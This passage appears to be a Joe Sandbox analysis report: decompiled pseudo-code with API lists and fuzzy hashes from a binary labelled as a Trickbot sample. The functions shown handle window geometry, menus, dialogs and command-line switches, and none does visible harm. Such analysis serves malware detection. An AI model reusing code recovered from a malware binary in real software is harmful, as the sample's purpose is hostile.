                          							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
                          						} else {
                          							L33:
                          							_push(0xd);
                          							goto L51;
                          						}
                          					} else {
                          						_push(0xc);
                          						L51:
                          						_pop(_t161);
                          					}
                          				}
                          				if((_v7 & 0x00000008) != 0) {
                          					goto L54;
                          				}
                          				return _t161;
                          			}

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • GetWindowRect.USER32(?,?), ref: 0042F66A
                          • GetSystemMetrics.USER32(00000021), ref: 0042F678
                          • GetSystemMetrics.USER32(00000020), ref: 0042F681
                          • GetKeyState.USER32(00000002), ref: 0042F6B6
                          • InflateRect.USER32(?,?,00000000), ref: 0042F6EE
                          • PtInRect.USER32(?,?,?), ref: 0042F772
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$MetricsSystemWindow$InflateLongState
                          • String ID:
                          • API String ID: 90034188-0
                          • Opcode ID: 51c60695f28d3e6aa7571b0be85ac81139f351f48d2ff465e61c3390eab60846
                          • Instruction ID: 90746cf88f7eb0170c70459fb27df5aac318e4175263f4fec58a5719fc0ffb12
                          • Opcode Fuzzy Hash: 51c60695f28d3e6aa7571b0be85ac81139f351f48d2ff465e61c3390eab60846
                          • Instruction Fuzzy Hash: 0CA17432B0022DABDF04DFA8D945BEEB7B5EF48354F94803AD802E7240D7789985CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004317EC(void* __ecx, CHAR* _a4) {
                          				int _t10;
                          				int _t11;
                          				int _t12;
                          				int _t15;
                          				void* _t16;
                          				void* _t17;
                          				CHAR* _t18;
                          				void* _t21;
                          
                          				_t18 = _a4;
                          				_t21 = __ecx;
                          				_t10 = lstrcmpA(_t18, "pt");
                          				if(_t10 == 0) {
                          					 *((intOrPtr*)(_t21 + 0x10)) = 3;
                          					return _t10;
                          				}
                          				_t11 = lstrcmpA(_t18, "p");
                          				if(_t11 == 0) {
                          					 *((intOrPtr*)(_t21 + 0x10)) = 2;
                          					return _t11;
                          				}
                          				_t12 = lstrcmpiA(_t18, "Unregister");
                          				if(_t12 == 0) {
                          					L13:
                          					 *((intOrPtr*)(_t21 + 0x10)) = 5;
                          					return _t12;
                          				}
                          				_t12 = lstrcmpiA(_t18, "Unregserver");
                          				if(_t12 == 0) {
                          					goto L13;
                          				}
                          				if(lstrcmpA(_t18, "dde") == 0) {
                          					_t17 = E0042F1B5(_t13);
                          					 *((intOrPtr*)(_t21 + 0x10)) = 4;
                          					return _t17;
                          				}
                          				if(lstrcmpiA(_t18, "Embedding") == 0) {
                          					_t16 = E0042F1B5(_t14);
                          					 *((intOrPtr*)(_t21 + 8)) = 1;
                          					L12:
                          					 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
                          					return _t16;
                          				}
                          				_t15 = lstrcmpiA(_t18, "Automation");
                          				if(_t15 == 0) {
                          					_t16 = E0042F1B5(_t15);
                          					 *((intOrPtr*)(_t21 + 0xc)) = 1;
                          					goto L12;
                          				}
                          				return _t15;
                          			}

                          APIs
                          • lstrcmpA.KERNEL32(00000000,0043D134,?,?,?,?,004317D6,00000000), ref: 00431802
                          • lstrcmpA.KERNEL32(00000000,0043D130,?,?,?,?,004317D6,00000000), ref: 0043181A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: lstrcmp
                          • String ID: Automation$Embedding$Unregister$Unregserver$dde
                          • API String ID: 1534048567-1842294661
                          • Opcode ID: 1deb10844dd2b1421f30f222f33fd058582486318deb9182688de6430cd8e9f4
                          • Instruction ID: b7e7393ecc2181a3e13577f938f94a09214861f866a96aedcd350486add8f0ed
                          • Opcode Fuzzy Hash: 1deb10844dd2b1421f30f222f33fd058582486318deb9182688de6430cd8e9f4
                          • Instruction Fuzzy Hash: 3E11A0E2A00302A7DA247B72EC45F2776AC9F4C758F50793BA80292252DBFDD8054A6C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E0041E5B4(void* __ecx) {
                          				char _t92;
                          				signed int _t94;
                          				int _t98;
                          				int _t101;
                          				signed int _t105;
                          				CHAR* _t106;
                          				signed int _t109;
                          				void* _t117;
                          				CHAR** _t119;
                          				intOrPtr* _t139;
                          				void* _t141;
                          				signed int _t142;
                          				intOrPtr _t143;
                          				CHAR* _t148;
                          				CHAR* _t153;
                          				signed int _t155;
                          				signed int _t166;
                          				signed char _t171;
                          				signed int _t172;
                          				void* _t176;
                          				CHAR* _t179;
                          				void* _t181;
                          				void* _t183;
                          				void* _t184;
                          
                          				E00405340(E00438858, _t181);
                          				_t184 = _t183 - 0x124;
                          				_t179 =  *(_t181 + 8);
                          				_t176 = __ecx;
                          				_t92 = _t179[0xc];
                          				_t139 = __ecx + 0x1c;
                          				 *(_t181 - 0x18) = _t92;
                          				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) - 8)) == 0) {
                          					_t187 = _t92;
                          					if(_t92 != 0) {
                          						 *(_t181 + 8) = _t179[4];
                          						GetMenuStringA( *( *(_t181 - 0x18) + 4),  *(_t181 + 8), E004181F7(_t139, _t181, 0x100), 0x100, 0);
                          						E00418246(_t139, _t187, 0xffffffff);
                          					}
                          				}
                          				_t94 = 0;
                          				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t176 + 8)))) - 8)) != 0) {
                          					__eflags = _t179[0xc];
                          					if(_t179[0xc] == 0) {
                          						goto L23;
                          					}
                          					_t141 = 0;
                          					__eflags =  *(_t176 + 4);
                          					if( *(_t176 + 4) <= 0) {
                          						L10:
                          						GetCurrentDirectoryA(0x104, _t181 - 0x130);
                          						_t98 = lstrlenA(_t181 - 0x130);
                          						_t148 =  *0x447478; // 0x44748c
                          						 *((char*)(_t181 + _t98 - 0x130)) = 0x5c;
                          						 *(_t181 + _t98 - 0x12f) =  *(_t181 + _t98 - 0x12f) & 0x00000000;
                          						_t99 = _t98 + 1;
                          						 *(_t181 - 0x18) = _t98 + 1;
                          						 *(_t181 - 0x14) = _t148;
                          						_t142 = 0;
                          						 *(_t181 - 0x10) = _t148;
                          						 *(_t181 - 4) = 0;
                          						__eflags =  *(_t176 + 4);
                          						 *(_t181 - 4) = 1;
                          						if( *(_t176 + 4) <= 0) {
                          							L22:
                          							_t179[8] = _t179[8] - 1;
                          							_t101 = GetMenuItemCount( *(_t179[0xc] + 4));
                          							 *(_t181 - 4) =  *(_t181 - 4) & 0x00000000;
                          							_t179[0x20] = _t101;
                          							_t179[0x18] = 1;
                          							E00417EC8(_t181 - 0x10);
                          							_t86 = _t181 - 4;
                          							 *_t86 =  *(_t181 - 4) | 0xffffffff;
                          							__eflags =  *_t86;
                          							_t94 = E00417EC8(_t181 - 0x14);
                          							goto L23;
                          						}
                          						while(1) {
                          							_t105 = E0041E4AE(_t176, _t181 - 0x14, _t142, _t181 - 0x130, _t99, 1);
                          							__eflags = _t105;
                          							if(_t105 == 0) {
                          								goto L22;
                          							}
                          							_t106 =  *(_t181 - 0x14);
                          							 *(_t181 + 8) = _t106;
                          							__eflags =  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8));
                          							_t109 = E004181F7(_t181 - 0x10, _t181,  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8)));
                          							_t153 =  *(_t181 + 8);
                          							while(1) {
                          								_t166 =  *_t153;
                          								__eflags = _t166;
                          								if(__eflags == 0) {
                          									break;
                          								}
                          								__eflags = _t166 - 0x26;
                          								if(_t166 == 0x26) {
                          									 *_t109 = _t166;
                          									_t109 = _t109 + 1;
                          									__eflags = _t109;
                          								}
                          								_t171 =  *_t153;
                          								 *(_t181 + 0xb) = _t171;
                          								_t172 = _t171 & 0x000000ff;
                          								__eflags =  *(_t172 + 0x44d1e1) & 0x00000004;
                          								if(( *(_t172 + 0x44d1e1) & 0x00000004) != 0) {
                          									 *_t109 =  *(_t181 + 0xb);
                          									_t109 = _t109 + 1;
                          									_t153 =  &(_t153[1]);
                          									__eflags = _t153;
                          								}
                          								 *_t109 =  *_t153;
                          								_t109 = _t109 + 1;
                          								_t153 =  &(_t153[1]);
                          							}
                          							 *_t109 =  *_t109 & 0x00000000;
                          							E00418246(_t181 - 0x10, __eflags, 0xffffffff);
                          							_t155 = 0xa;
                          							_push(( *((intOrPtr*)(_t176 + 0x14)) + _t142 + 1) % _t155);
                          							wsprintfA(_t181 - 0x2c, "&%d ");
                          							_t184 = _t184 + 0xc;
                          							_t117 = E00417F36(_t181 - 0x20, _t181, _t181 - 0x2c);
                          							 *(_t181 - 4) = 2;
                          							_push(_t181 - 0x10);
                          							_push(_t117);
                          							_push(_t181 - 0x1c);
                          							_t119 = E0041806A(_t181 - 0x10, __eflags);
                          							_t158 = _t179[8];
                          							 *(_t181 + 8) =  *_t119;
                          							_t121 = _t179[4];
                          							_t67 = _t158 + 1; // 0x1
                          							_t179[8] = _t67;
                          							_t69 = _t121 + 1; // 0x3
                          							_t179[4] = _t69;
                          							InsertMenuA( *(_t179[0xc] + 4), _t179[8], 0x400, _t179[4],  *(_t181 + 8));
                          							E00417EC8(_t181 - 0x1c);
                          							 *(_t181 - 4) = 1;
                          							E00417EC8(_t181 - 0x20);
                          							_t142 = _t142 + 1;
                          							__eflags = _t142 -  *(_t176 + 4);
                          							if(_t142 <  *(_t176 + 4)) {
                          								_t99 =  *(_t181 - 0x18);
                          								continue;
                          							}
                          							goto L22;
                          						}
                          						goto L22;
                          					} else {
                          						goto L9;
                          					}
                          					do {
                          						L9:
                          						DeleteMenu( *(_t179[0xc] + 4), _t179[4] + _t141, 0);
                          						_t141 = _t141 + 1;
                          						__eflags = _t141 -  *(_t176 + 4);
                          					} while (_t141 <  *(_t176 + 4));
                          					goto L10;
                          				} else {
                          					_t143 =  *_t139;
                          					if( *((intOrPtr*)(_t143 - 8)) != 0) {
                          						 *((intOrPtr*)( *_t179 + 0xc))(_t143);
                          					}
                          					_t94 =  *( *_t179)(0);
                          					L23:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                          					return _t94;
                          				}
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041E5B9
                          • GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 0041E602
                            • Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259
                            • Part of subcall function 0041806A: __EH_prolog.LIBCMT ref: 0041806F
                          • DeleteMenu.USER32(?,?,00000000), ref: 0041E657
                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041E66F
                          • lstrlenA.KERNEL32(?), ref: 0041E67C
                          • wsprintfA.USER32 ref: 0041E741
                          • GetMenuItemCount.USER32(00000001), ref: 0041E7BC
                          • InsertMenuA.USER32(00000002,00000000,00000400,00000002,00000000), ref: 0041E78F
                            • Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Menu$H_prologlstrlen$CountCurrentDecrementDeleteDirectoryInsertInterlockedItemStringwsprintf
                          • String ID: &%d $\
                          • API String ID: 3188129661-1982479665
                          • Opcode ID: fcace9284245d27419bfc17ea5fb48adc5c4eb2041604493cbe5413d3927dd6b
                          • Instruction ID: 18925f41e954725a6c414503a77f1e640bde2149bbc025fa5eed2a7b53e34103
                          • Opcode Fuzzy Hash: fcace9284245d27419bfc17ea5fb48adc5c4eb2041604493cbe5413d3927dd6b
                          • Instruction Fuzzy Hash: 1B71F179900209EFDB01DFA5C884AEEBBF4FF08304F10816EE856D7291D774A984CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0041755F(intOrPtr* __ecx) {
                          				intOrPtr _t81;
                          				intOrPtr _t91;
                          				struct HWND__* _t92;
                          				intOrPtr* _t143;
                          				intOrPtr* _t146;
                          				void* _t148;
                          				void* _t150;
                          
                          				_t119 = __ecx;
                          				E00405340(E00437748, _t148);
                          				_t146 = __ecx;
                          				 *((intOrPtr*)(_t148 - 0x10)) = _t150 - 0x34;
                          				 *((intOrPtr*)(_t148 - 0x24)) = __ecx;
                          				if( *(_t148 + 0x10) == 0) {
                          					 *(_t148 + 0x10) =  *(E00432562() + 8);
                          				}
                          				_t143 =  *((intOrPtr*)(E00432562() + 0x1038));
                          				 *((intOrPtr*)(_t148 - 0x28)) = _t143;
                          				 *(_t148 - 0x14) = 0;
                          				 *(_t148 - 0x18) = 0;
                          				 *(_t148 - 4) = 0;
                          				E0041B266(_t119, 0x10);
                          				E0041B266(_t119, 0x3c000);
                          				if(_t143 == 0) {
                          					L5:
                          					if( *(_t148 + 8) == 0) {
                          						L31:
                          						L33:
                          						 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
                          						return 0;
                          					}
                          					_t81 =  *0x447478; // 0x44748c
                          					 *((intOrPtr*)(_t148 - 0x1c)) = _t81;
                          					 *(_t148 - 4) = 1;
                          					 *((intOrPtr*)(_t148 - 0x20)) = 0;
                          					if((0 | E0041C952( *(_t148 + 8), _t148 - 0x1c, _t148 - 0x20) == 0x00000000) != 0) {
                          						L13:
                          						E0041C7A1(_t148 - 0x40,  *(_t148 + 8));
                          						 *(_t148 - 4) = 2;
                          						E0041CADB(_t148 - 0x40,  *((intOrPtr*)(_t148 - 0x20)));
                          						 *(_t148 - 0x14) = E0041C83E(_t148 - 0x40);
                          						 *(_t148 - 4) = 1;
                          						E0041C830(_t148 - 0x40);
                          						if( *(_t148 - 0x14) != 0) {
                          							 *(_t148 + 8) = GlobalLock( *(_t148 - 0x14));
                          						}
                          						L15:
                          						 *(_t146 + 0x2c) =  *(_t146 + 0x2c) | 0xffffffff;
                          						 *(_t146 + 0x24) =  *(_t146 + 0x24) | 0x00000010;
                          						E00418D00(_t148, _t146);
                          						_t91 =  *((intOrPtr*)(_t148 + 0xc));
                          						if(_t91 != 0) {
                          							_t92 =  *(_t91 + 0x1c);
                          						} else {
                          							_t92 = 0;
                          						}
                          						 *(_t148 - 0x18) = CreateDialogIndirectParamA( *(_t148 + 0x10),  *(_t148 + 8), _t92, E004172A4, 0);
                          						 *(_t148 - 4) = 0;
                          						E00417EC8(_t148 - 0x1c);
                          						 *(_t148 - 4) =  *(_t148 - 4) | 0xffffffff;
                          						if(_t143 != 0) {
                          							 *((intOrPtr*)( *_t143 + 0x14))(_t148 - 0x34);
                          							if( *(_t148 - 0x18) != 0) {
                          								 *((intOrPtr*)( *_t146 + 0xb4))(0);
                          							}
                          						}
                          						if(E00418D4C() == 0) {
                          							 *((intOrPtr*)( *_t146 + 0xa4))();
                          						}
                          						if( *(_t148 - 0x18) != 0 && ( *(_t146 + 0x24) & 0x00000010) == 0) {
                          							DestroyWindow( *(_t148 - 0x18));
                          							 *(_t148 - 0x18) = 0;
                          						}
                          						if( *(_t148 - 0x14) != 0) {
                          							GlobalUnlock( *(_t148 - 0x14));
                          							GlobalFree( *(_t148 - 0x14));
                          						}
                          						if( *(_t148 - 0x18) != 0 || ( *(_t146 + 0x24) & 0x00000010) == 0) {
                          							_push(1);
                          							_pop(0);
                          							goto L33;
                          						} else {
                          							goto L31;
                          						}
                          					}
                          					if(GetSystemMetrics(0x2a) == 0 || E0040504F( *((intOrPtr*)(_t148 - 0x1c)), "MS Shell Dlg") != 0 && E0040504F( *((intOrPtr*)(_t148 - 0x1c)), "MS Sans Serif") != 0 && E0040504F( *((intOrPtr*)(_t148 - 0x1c)), ?str?) != 0) {
                          						goto L15;
                          					} else {
                          						if( *((short*)(_t148 - 0x20)) == 8) {
                          							 *((intOrPtr*)(_t148 - 0x20)) = 0;
                          						}
                          						goto L13;
                          					}
                          				}
                          				_push(_t148 - 0x34);
                          				if( *((intOrPtr*)( *_t146 + 0xb4))() == 0) {
                          					goto L31;
                          				}
                          				 *(_t148 + 8) =  *((intOrPtr*)( *_t143 + 0x10))(_t148 - 0x34,  *(_t148 + 8));
                          				goto L5;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00417564
                          • GetSystemMetrics.USER32(0000002A), ref: 00417616
                          • GlobalLock.KERNEL32(?,?,00000000,?), ref: 004176A0
                          • CreateDialogIndirectParamA.USER32(?,?,?,Function_000172A4,00000000), ref: 004176D2
                            • Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC
                          • DestroyWindow.USER32(0043A9D0), ref: 00417749
                          • GlobalUnlock.KERNEL32(?,?,?,00000000,?), ref: 0041775A
                          • GlobalFree.KERNEL32(?), ref: 00417763
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
                          • String ID: Helv$MS Sans Serif$MS Shell Dlg
                          • API String ID: 2343056566-2894235370
                          • Opcode ID: 7bbe96c57c18692c3f4821669d396ab0e3751de740c1d09e1f9de2a533ca9933
                          • Instruction ID: 40b7ef30976542998248d9f651bb598fe2cde8951718d0c051aeba893af69318
                          • Opcode Fuzzy Hash: 7bbe96c57c18692c3f4821669d396ab0e3751de740c1d09e1f9de2a533ca9933
                          • Instruction Fuzzy Hash: E1618F7190420AEFCF11EFA4D9859EEBBB1BF04314F20442FF555A2291DB789E81CB99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00413440(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20) {
                          				struct tagRECT _v16;
                          				struct tagRECT _v36;
                          				int _t59;
                          				long _t72;
                          				intOrPtr* _t85;
                          				intOrPtr _t87;
                          				intOrPtr* _t94;
                          				struct HWND__* _t98;
                          				struct HWND__* _t99;
                          				int _t101;
                          				long _t102;
                          
                          				_t101 = _a8;
                          				_t111 = _t101 - 0x82;
                          				if(_t101 != 0x82) {
                          					_t98 = _a4;
                          					__eflags = GetPropA(_t98, 0);
                          					if(__eflags == 0) {
                          						__eflags = _t101 - 0x18;
                          						if(__eflags > 0) {
                          							__eflags = _t101 - 0x83;
                          							if(__eflags > 0) {
                          								__eflags = _t101 - 0x1943;
                          								if(__eflags < 0) {
                          									goto L7;
                          								} else {
                          									__eflags = _t101 - 0x1944;
                          									if(__eflags <= 0) {
                          										 *_a16 = 1;
                          										return 0x3e9;
                          									} else {
                          										goto L7;
                          									}
                          								}
                          							} else {
                          								if(__eflags == 0) {
                          									__eflags =  *0x44d360 - 0x30a;
                          									if(__eflags >= 0) {
                          										goto L7;
                          									} else {
                          										GetWindowRect(_t98,  &_v16);
                          										_t102 = CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
                          										_t94 = _a12;
                          										_t85 =  &_v36;
                          										 *_t85 =  *_t94;
                          										 *((intOrPtr*)(_t85 + 4)) =  *((intOrPtr*)(_t94 + 4));
                          										 *((intOrPtr*)(_t85 + 8)) =  *((intOrPtr*)(_t94 + 8));
                          										 *((intOrPtr*)(_t85 + 0xc)) =  *((intOrPtr*)(_t94 + 0xc));
                          										InflateRect( &_v36, 2, 1);
                          										_t87 = _v16.right;
                          										__eflags = _v36.bottom - _t87;
                          										if(_v36.bottom < _t87) {
                          											_t59 = _v36.bottom + 1;
                          											__eflags = _t59;
                          											_v36.top = _t59;
                          											_v36.bottom = _t87 + 1;
                          											_t99 = GetParent(_t98);
                          											ScreenToClient(_t99,  &_v36);
                          											ScreenToClient(_t99,  &(_v36.right));
                          											InvalidateRect(_t99,  &_v36, 1);
                          										}
                          										return _t102;
                          									}
                          								} else {
                          									__eflags = _t101 - 0x46;
                          									if(__eflags == 0) {
                          										__eflags =  *0x44d360 - 0x30a;
                          										if(__eflags >= 0) {
                          											E004122E0(_t98, _a16);
                          										}
                          									}
                          									goto L7;
                          								}
                          							}
                          						} else {
                          							if(__eflags == 0) {
                          								__eflags =  *0x44d360 - 0x30a;
                          								if(__eflags < 0) {
                          									__eflags = _a12;
                          									if(__eflags == 0) {
                          										E004122E0(_t98, 0);
                          									}
                          								}
                          								goto L7;
                          							} else {
                          								__eflags = _t101 - 0xf;
                          								if(__eflags == 0) {
                          									_t72 = CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
                          									E00412F80(_t98, 0, _a20);
                          									return _t72;
                          								} else {
                          									L7:
                          									return CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
                          								}
                          							}
                          						}
                          					} else {
                          						return CallWindowProcA(E00410610(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
                          					}
                          				} else {
                          					return E00410840(_t111, _a4, _t101, _a12, _a16, _a20);
                          				}
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 00413484
                          • CallWindowProcA.USER32(00000000), ref: 004134A9
                            • Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$CallProcRemoveWindow
                          • String ID:
                          • API String ID: 2276450057-0
                          • Opcode ID: 5f6332765df40542be61fce3ac7c08893d7d92277b7ac3c206b96f86d35721ed
                          • Instruction ID: 8475b593838957f47efc4661ee566d8bb1c018f192de32ee172b5bbbee78746a
                          • Opcode Fuzzy Hash: 5f6332765df40542be61fce3ac7c08893d7d92277b7ac3c206b96f86d35721ed
                          • Instruction Fuzzy Hash: 8951B176A04200BFD710EF45DC85DBFB7B8EBC9725F44852EF94483200D279AD868BA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E004137D0(struct HWND__* _a4, struct HDC__* _a8) {
                          				struct tagRECT _v16;
                          				signed int _v20;
                          				char _v24;
                          				intOrPtr _v28;
                          				void* _t26;
                          				struct HWND__* _t43;
                          
                          				_t43 = _a4;
                          				_t26 = GetWindowLongA(_t43, 0xfffffff0);
                          				_v20 = _t26;
                          				if((_t26 & 0x10000000) == 0) {
                          					L15:
                          					return _t26;
                          				} else {
                          					GetClientRect(_t43,  &_v16);
                          					_t26 = _v20 & 0x0000001f;
                          					if(_t26 > 0x12) {
                          						goto L15;
                          					} else {
                          						switch( *((intOrPtr*)(0 +  &M00413934))) {
                          							case 0:
                          								_t38 = SendMessageA(_t43, 0x31, 0, 0);
                          								if(_t38 == 0) {
                          									_t42 = _a8;
                          								} else {
                          									_t42 = _a8;
                          									_t38 = SelectObject(_t42, _t38);
                          								}
                          								SetBkMode(_t42, 2);
                          								_t45 = SendMessageA(GetParent(_t43), 0x138, _t42, _t43);
                          								_t51 = _t45;
                          								if(_t45 != 0) {
                          									_t45 = SelectObject(_t42, _t45);
                          								}
                          								_t26 = E004136F0(_t51, _t43, _t42,  &_v24, _v28);
                          								if(_t38 != 0) {
                          									_t26 = SelectObject(_t42, _t38);
                          								}
                          								if(_t45 == 0) {
                          									goto L15;
                          								} else {
                          									return SelectObject(_t42, _t45);
                          								}
                          								goto L16;
                          							case 1:
                          								__eax =  &_v16;
                          								_push(0xf);
                          								_push(0);
                          								return E00410920(_a8,  &_v16, 2);
                          								goto L16;
                          							case 2:
                          								__eax =  &_v16;
                          								_push(0xf);
                          								_push(0);
                          								_v16.left = _v16.left + 1;
                          								_t20 =  &(_v16.top);
                          								 *_t20 = _v16.top + 1;
                          								__eflags =  *_t20;
                          								E00410920(_a8,  &_v16, 0) = OffsetRect( &_v16, 0xffffffff, 0xffffffff);
                          								_push(0xf);
                          								_push(2);
                          								return E00410920(_a8,  &_v16, 2);
                          								goto L16;
                          							case 3:
                          								__eax =  &_v16;
                          								_push(0xf);
                          								_push(2);
                          								return E00410920(_a8,  &_v16, 0);
                          							case 4:
                          								goto L15;
                          						}
                          					}
                          				}
                          				L16:
                          			}

                          APIs
                          • GetWindowLongA.USER32(?,000000F0), ref: 004137DE
                          • GetClientRect.USER32(?,?), ref: 004137F9
                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041382B
                          • SelectObject.GDI32(?,00000000), ref: 00413839
                          • SetBkMode.GDI32(?,00000002), ref: 0041384A
                          • GetParent.USER32(?), ref: 00413858
                          • SendMessageA.USER32(00000000), ref: 0041385F
                          • SelectObject.GDI32(?,00000000), ref: 00413869
                          • SelectObject.GDI32(?,00000000), ref: 0041388B
                          • SelectObject.GDI32(?,00000000), ref: 0041389B
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 004138F2
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
                          • String ID:
                          • API String ID: 3606012576-0
                          • Opcode ID: f5e5fc7cf061de274a62077bd04af8ebf219799e8257272e77fd26ec38f0fab2
                          • Instruction ID: 29591e938e965fccbcfd294214db091b755d3254d59085554c9ab1b470bb1492
                          • Opcode Fuzzy Hash: f5e5fc7cf061de274a62077bd04af8ebf219799e8257272e77fd26ec38f0fab2
                          • Instruction Fuzzy Hash: 72410B732043017BD610AF549C46FBF73ACEBC5B25F44012EFA0156183DBA9DA45877A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410F41(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12) {
                          				long _t9;
                          				struct HWND__* _t15;
                          				struct HWND__* _t21;
                          				struct HWND__* _t24;
                          				long _t25;
                          				long _t30;
                          				void* _t37;
                          				signed int _t40;
                          				struct HWND__* _t45;
                          				struct HWND__* _t49;
                          				void* _t58;
                          
                          				_t1 = __ebx + 0x56;
                          				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
                          				if( *_t1 != 0) {
                          					_t49 = _a12;
                          					_t9 = GetWindowLongA(_t49, 0xfffffffc);
                          					_t40 = 0;
                          					__eflags = 0;
                          					_t37 = RemovePropA;
                          					do {
                          						_t42 = _t40 + _t40 * 2;
                          						__eflags =  *((intOrPtr*)(0x44dda0 + (_t40 + _t40 * 2) * 8)) - _t9;
                          						if(__eflags == 0) {
                          							_t30 = E00410610(__eflags, _t49, _t40);
                          							_t58 = _t58 + 8;
                          							RemovePropA(_t49, 0);
                          							SetWindowLongA(_t49, 0xfffffffc, _t30);
